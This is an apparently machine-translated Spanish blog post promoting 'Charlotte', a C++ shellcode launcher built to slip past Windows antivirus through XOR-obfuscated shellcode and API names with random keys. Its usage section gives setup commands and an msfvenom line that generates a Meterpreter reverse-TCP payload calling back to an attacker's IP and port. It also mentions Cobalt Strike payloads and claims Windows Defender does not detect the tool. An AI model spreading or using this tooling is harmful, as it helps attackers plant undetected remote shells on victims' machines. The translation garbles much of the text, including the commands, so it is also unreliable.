Linux

▶ Lanzador de shellcode C ++ absolutamente irreconocible

Charlotte Es un deportista de shellcode C ++ absolutamente irreconocible.

la descripcion

  • 13 de mayo de 2021:
    • c ++: Deportista de Shellcode, completamente irreconocible desde el 13 de mayo de 2021 el 26/02.
    • Normas activas para las funcionalidades de la Interfaz de programación de aplicaciones de Win32
    • Código de shell, misterio de XOR y nombre de la función
    • Teclas XOR al azar y cambiantes para cada ejecución
    • Bajo Kali Linux, ¡sencillamente «apt-get install mingw-w64 *» es bastante!
  • 17 de mayo de 2021:
    • Distancia de creencia azarosa y distancia segrega XOR

Escaneo inverso

emplear

git clona el repositorio, crea un fichero shellcode llamado beacon.bin y ejecuta charlotte.py

Ejemplo:

Calco de Git https://github.com/9emin1/charlotte.git && apt-get install mingw-w64 *
Charlotte disco compacto
msfvenom -p windows / x64 / meterpreter_reverse_tcp LHOST = $ YOUR_IP LPORT = $ YOUR_PORT -f raw> beacon.bin
charlotte.py pitón
virtud

Utilice msfvenom -p (consulte POC .gif ahora) y la carga útil sin procesar de Cobalt Strike para las pruebas

Actualización v1.1

17 y 21 de mayo:

Por supuesto, Windows Proteger puede admitir binarios .DLL. ¿De qué forma se identifican? Ya que se eliminaron múltiples claves XOR de 16 bytes, se han sustituido por 9, como se expone en el fichero POC .gif ahora, lo que señala que aún no se ha redescubierto. Los saludos.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba